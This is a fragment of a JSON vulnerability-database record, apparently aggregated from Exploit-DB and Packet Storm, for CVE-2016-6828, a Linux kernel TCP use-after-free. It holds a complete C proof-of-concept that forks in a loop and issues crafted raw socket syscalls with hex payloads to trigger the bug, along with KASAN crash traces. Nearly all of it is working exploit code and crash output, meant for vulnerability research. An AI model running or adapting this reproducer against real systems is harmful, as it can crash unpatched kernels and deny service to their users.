use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428\r\n[ 21.447953] Read of size 4 by task rsyslogd/1612\r\n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1\r\n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151\r\n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400\r\n[ 21.452002] ffff88007dc07290 
ffffffff815d0351 ffff88007dc07328 ffff88007a06d400\r\n[ 21.452873] Call Trace:\r\n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2\r\n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70\r\n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500\r\n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70\r\n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0\r\n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120\r\n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0\r\n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0\r\n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0\r\n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0\r\n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20\r\n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0\r\n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210\r\n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0\r\n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0\r\n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50\r\n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0\r\n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240\r\n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0\r\n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0\r\n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120\r\n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410\r\n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0\r\n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550\r\n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0\r\n[ 21.470179] [<ffffffff82beaa55>] ? 
raw6_local_deliver+0x555/0x6f0\r\n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50\r\n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0\r\n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90\r\n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50\r\n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0\r\n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0\r\n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340\r\n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750\r\n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20\r\n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50\r\n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500\r\n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0\r\n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0\r\n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0\r\n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120\r\n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280\r\n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350\r\n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420\r\n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40\r\n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0\r\n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170\r\n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580\r\n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0\r\n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0\r\n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20\r\n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110\r\n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30\r\n[ 21.490147] [<ffffffff812e3ca6>] ? 
clockevents_program_event+0x246/0x340\r\n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d\r\n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140\r\n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0\r\n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90\r\n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424\r\n[ 21.494277] Allocated:\r\n[ 21.494538] PID = 1711\r\n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0\r\n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20\r\n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0\r\n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0\r\n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790\r\n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10\r\n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.504144] Freed:\r\n[ 21.504368] PID = 1711\r\n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50\r\n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0\r\n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0\r\n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210\r\n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0\r\n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30\r\n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10\r\n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350\r\n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110\r\n[ 
21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0\r\n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640\r\n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0\r\n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0\r\n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8\r\n[ 21.513258] Memory state around the buggy address:\r\n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc\r\n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.516114] ^\r\n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\r\n[ 21.518203] ==================================================================\r\n*/", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40731/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:26", "description": "", "published": "2016-11-09T00:00:00", "type": "packetstorm", "title": "Linux Kernel TCP Related Read Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-11-09T00:00:00", "id": "PACKETSTORM:139642", "href": "https://packetstormsecurity.com/files/139642/Linux-Kernel-TCP-Related-Read-Use-After-Free.html", "sourceData": "`// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html \n \n// to build clang derp4.c -o derp4 -static \n \n#include <unistd.h> \n#include <sys/syscall.h> \n#include <string.h> \n#include <stdint.h> \n#include <pthread.h> \n#include <stdio.h> \n \n#ifndef SYS_mmap \n#define SYS_mmap 9 \n#endif \n#ifndef SYS_socket \n#define SYS_socket 41 \n#endif \n#ifndef SYS_bind \n#define SYS_bind 49 \n#endif \n#ifndef SYS_sendto \n#define SYS_sendto 44 \n#endif \n#ifndef SYS_setsockopt 
\n#define SYS_setsockopt 54 \n#endif \n#ifndef SYS_dup \n#define SYS_dup 32 \n#endif \n#ifndef SYS_sendmsg \n#define SYS_sendmsg 46 \n#endif \n#ifndef SYS_recvfrom \n#define SYS_recvfrom 45 \n#endif \n#ifndef SYS_write \n#define SYS_write 1 \n#endif \n \nlong r[62]; \n \n \nint main(int argc, char **argv) \n{ \nwhile (1) { \npid_t pid = fork(); \n \nif (pid == 0) { \nr[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nr[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0); \nmemcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128); \nr[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0); \nr[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \nmemcpy((void*)0x20012f5a, 
\"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165); \nmemcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28); \nr[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul); \n*(uint32_t*)0x20001fff = (uint32_t)0x2; \nr[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0); \nr[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0); \n*(uint32_t*)0x20018000 = (uint32_t)0x4; \nr[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0); \n*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000; \n*(uint32_t*)0x2000dfd0 = (uint32_t)0xc; \n*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000; \n*(uint64_t*)0x2000dfe0 = (uint64_t)0x1; \n*(uint64_t*)0x2000dfe8 = (uint64_t)0x0; \n*(uint64_t*)0x2000dff0 = (uint64_t)0x0; \n*(uint32_t*)0x2000dff8 = (uint32_t)0x4; \n*(uint16_t*)0x2000e000 = (uint16_t)0x0; \n*(uint16_t*)0x2000e002 = (uint16_t)0x0; \n*(uint32_t*)0x2000e004 = (uint32_t)0xffff; \n*(uint32_t*)0x2000e008 = (uint32_t)0x401; \n*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a; \n*(uint64_t*)0x20000008 = (uint64_t)0x37; 
\n*(uint32_t*)0x2000ed3a = (uint32_t)0x14; \n*(uint16_t*)0x2000ed3e = (uint16_t)0x2; \n*(uint16_t*)0x2000ed40 = (uint16_t)0x12; \n*(uint32_t*)0x2000ed42 = (uint32_t)0x1f; \n*(uint32_t*)0x2000ed46 = (uint32_t)0x7; \n*(uint8_t*)0x2000ed4a = (uint8_t)0x6; \n*(uint8_t*)0x2000ed4b = (uint8_t)0x100; \n*(uint8_t*)0x2000ed4c = (uint8_t)0x3f; \n*(uint32_t*)0x2000ed4d = (uint32_t)0x11; \n*(uint16_t*)0x2000ed51 = (uint16_t)0x0; \n*(uint16_t*)0x2000ed53 = (uint16_t)0x808; \n*(uint32_t*)0x2000ed55 = (uint32_t)0x1; \n*(uint32_t*)0x2000ed59 = (uint32_t)0x0; \n*(uint8_t*)0x2000ed5d = (uint8_t)0x0; \n*(uint32_t*)0x2000ed5e = (uint32_t)0x12; \n*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea; \n*(uint16_t*)0x2000ed64 = (uint16_t)0x200; \n*(uint32_t*)0x2000ed66 = (uint32_t)0x5; \n*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff; \n*(uint8_t*)0x2000ed6e = (uint8_t)0x9; \n*(uint8_t*)0x2000ed6f = (uint8_t)0x1; \nr[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0); \n*(uint16_t*)0x20001003 = (uint16_t)0x1; \n*(uint8_t*)0x20001005 = (uint8_t)0x0; \n*(uint32_t*)0x20001007 = (uint32_t)0x9; \nr[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul); \nmemcpy((void*)0x20015285, 
\"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x37\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\xc6\\xd2\\xe9\\x1a\\xf4\\xb0\\x9b\\x85\\x9b\\x3f\\xb1\\xf3\\xc3\\x48\\xc5\\xe7\\x45\\x0b\\x21\\x2d\\x32\\x27\\x92\\x3c\\x39\\x52\\x0f\\x2b\\xdf\\x52\\x66\\x6f\\x01\\x8f\\xdc\\xfa\\x8f\\x5e\\x53\\xb7\\x82\\x23\\x79\\xfa\\x28\\xe5\\x24\\xa7\\x5e\\x2a\\x24\\x7e\\xd0\\x1e\\xd5\\x1a\\xb6\\xb8\\x
e5\\xb2\\x6d\\x4d\\x38\\x61\\x79\\xb8\\xd1\\x27\\x92\\x63\\x0c\\xed\\x3c\\xf1\\x13\\x98\\x37\\xfa\\x98\\xda\\x0c\\x1a\\x86\\xd1\\x6a\\x12\\x86\\x2f\\xd0\\x8d\\x8e\\x2e\\x52\\x23\\xac\\x2d\\x82\\x59\\xef\\x17\\xbc\\xf1\\x47\\xfb\\xf0\\x5f\\x43\\x70\\x99\\x14\\xdf\\xaf\\x44\\x02\\xb5\\xe9\\x39\\x51\\x8e\\xf2\\x07\\x9c\\xa2\\x39\\xab\\x07\\xa2\\x22\\xa7\\xd3\\x5c\\xc0\\x8c\\xcf\\x3c\\xa2\\xa7\\xd0\\xd6\\xf4\\x82\\xcc\\x35\\x75\\x3a\\x20\\xb7\\x9b\\xf3\\x9d\\xd9\\xfe\\xdf\\x1e\\x3f\\x55\\xf2\\x99\\xdb\\xd0\\xb2\\xd7\\x86\\xc1\\xfa\\xb3\\xc7\\x99\\xdc\\x02\\xe3\\x9f\\xfd\\x1e\\x56\\xc1\\xf2\\x51\\x32\\x84\\x61\\x30\\x33\\xf6\\xe3\\x82\\x9f\\xf2\\x04\\xaf\\x5d\\xf4\\x3d\\xa6\\x0e\\x25\\x53\\xe9\\x05\\x7c\\x42\\xbf\\xfa\\x97\\xd7\\x77\\x8c\\x8f\\x29\\x7a\\xcb\\x40\\x13\\x07\\xb5\\x8d\\x69\\xdc\\x8b\\x35\\xd3\\xb6\\xf3\\xd8\\x07\\x94\\x7e\\x69\\x0f\\xb7\\x28\\xf1\\xb3\\x45\\x60\\x37\\x65\\xa4\\xf6\\xbf\\x9c\\xb3\\xf9\\x3d\\xe1\\x08\\x08\\xc9\\x76\\x5e\\x8b\\x7f\\x26\\x01\\x9d\\x8f\\x15\\x39\\x02\\xfe\\x8a\\xe3\\x3b\\x8b\\xf9\\xae\\x06\\x04\\xef\\x0d\\xcf\\x67\\x24\\x54\\xe6\\x4c\\xe4\\x05\\x8e\\xd7\\xda\\x4c\\xf2\\xd7\\x88\\x75\\x87\\xf7\\x7e\\xd0\\x49\\x19\\x02\\x5e\\x00\\xc4\\xeb\\x3e\\xec\\x70\\x35\\x9c\\x9b\\xc9\\xd9\\x47\\x65\\x4c\\xa3\\xdb\\x0e\\xde\\x1e\\x76\\x58\\x27\\xe0\\x91\\x6b\\xf9\\x25\\x44\\xa6\\xa2\\x85\\x8f\\x50\\xd0\\x13\\x88\\x57\\x25\\x56\\x78\\xed\\xcb\\x6b\\xec\\xf2\\x4f\\xd4\\xce\\xf1\\x90\\xcd\\x49\\x50\\xb5\\xcf\\xd3\\x96\\x4d\\x3c\\xf4\\x54\\x8e\\xa9\\xdb\\xd3\\xb5\\x9e\\xe9\\x87\\x19\\x8b\\x59\\xd7\\xf2\\xcf\\x1a\\xd3\\x70\\xca\\x42\\xc6\\x97\\x66\\x38\\x24\\x39\\x4d\\x42\\xa1\\xf0\\x24\\x46\\xe4\\x0e\\x9c\\xbc\\xc4\\x53\\xa9\\xb9\\x94\\x4d\\xca\\x48\\xa6\\x04\\xb8\\x2f\\x4f\\xf5\\x85\\x32\\x22\\xf8\\x4e\\x83\\xab\\x34\\x27\\x3b\\x8f\\x24\\x48\\x15\\x9b\\xa9\\xf8\\xb9\\xb7\\xcb\\xd5\\xfb\\x72\\xec\\x7a\\xc3\\x39\\x9c\\xde\\x25\\x76\\x08\\x3f\\x49\\x35\\xbd\\x42\\x4f\\x3f\\x5e\\xfc\\x6b\\x6b\\x9e\\x3e\\x34\\x47\\x62\\xed\\x5a\\xae\\xdc\\xcf\\x4e\\x
e6\\x18\\xfa\\x7f\\xe6\\x46\\xc8\\xbe\\xbc\\x42\\x88\\xb6\\xfe\\xbd\\x96\\x85\\x5a\\x4a\\x1d\\xd2\\x00\\xe9\\x71\\x48\\x48\\x52\\xd6\\xf5\\x88\\x7d\\x94\\x18\\xf6\\xf0\\x5c\\x0a\\x39\\x29\\xc8\\x78\\xa0\\xa8\\x44\\xf4\\xb6\\xca\\x78\\x75\\x4a\\xf7\\x53\\xd7\\x7e\\x23\\xaf\\x6b\\xf9\\xcd\\x77\\xb2\\xd0\\x37\\x29\\x9c\\x57\\xbe\\x9e\\x5f\\x7c\\xe4\\x41\\x59\\xde\\xd5\\x63\\x02\\x2a\\xc0\\x74\\xa6\\x00\\xe2\\x8f\\x83\\x30\\xc1\\x60\\xcd\\xb3\\xca\\x44\\x1d\\x88\\x54\\x8b\\xbc\\xa8\\x79\\x78\\x86\\xa2\\x49\\x7c\\x94\\x49\\xf3\\xb4\\x41\\x44\\x76\\x33\\xf1\\x2e\\x71\\xbc\\xa1\\x39\\xb9\\x68\\x56\\xd9\\xa0\\xa1\\x6f\\xdc\\x7d\\xa3\\xb8\\x4f\\x1c\\xb8\\x19\\x26\\x42\\x88\\x0e\\xcb\\xbb\\xc9\\x6c\\xa8\\xf8\\xe9\\x37\\x86\\x61\\x37\\x9f\\xba\\xb3\\x9e\\x54\\x07\\xe6\\xff\\x6f\\x54\\x8c\\xcf\\x7e\\x3d\\x14\\xfd\\x94\\xbb\\xdc\\x59\\x5d\\x22\\x86\\xb5\\x3b\\x18\\x0d\\x08\\xad\\x15\\x67\\x6b\\xf1\\xc8\\xd8\\x81\\xac\\x14\\x63\\xcf\\x1e\\xf9\\x48\\xba\\xe0\\x33\\x4c\\x1e\\x72\\xe9\\x00\\x1a\\x48\\xc5\\xb4\\x2c\\x71\\xd6\\x7a\\x0b\\x8f\\x6c\\x02\\x9a\\x02\\xa9\\x20\\xbd\\x8a \nr[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul); \nr[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \n*(uint32_t*)0x20022fdd = (uint32_t)0x28; \n*(uint32_t*)0x20022fe1 = (uint32_t)0x400; \n*(uint64_t*)0x20022fe5 = (uint64_t)0x0; \n*(uint64_t*)0x20022fed = (uint64_t)0x8ab; \n*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb; \n*(uint16_t*)0x20022ffd = (uint16_t)0x5; \nr[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0); \n} else if (pid > 0) { \nint returnStatus; \nwaitpid(pid, &returnStatus, 0); \nprintf(\"collected child\\n\"); \n} else { \nprintf(\"fork failed\\n\"); \nexit(1); \n} \n} \nreturn 0; \n} \n \n \n// KASAN report on v4.8-rc1, equivalent on master \n \n/* \n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428 \n[ 21.447953] Read of size 4 by 
task rsyslogd/1612 \n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1 \n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 \n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151 \n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400 \n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400 \n[ 21.452873] Call Trace: \n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2 \n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70 \n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500 \n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70 \n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120 \n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0 \n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0 \n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0 \n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0 \n[ 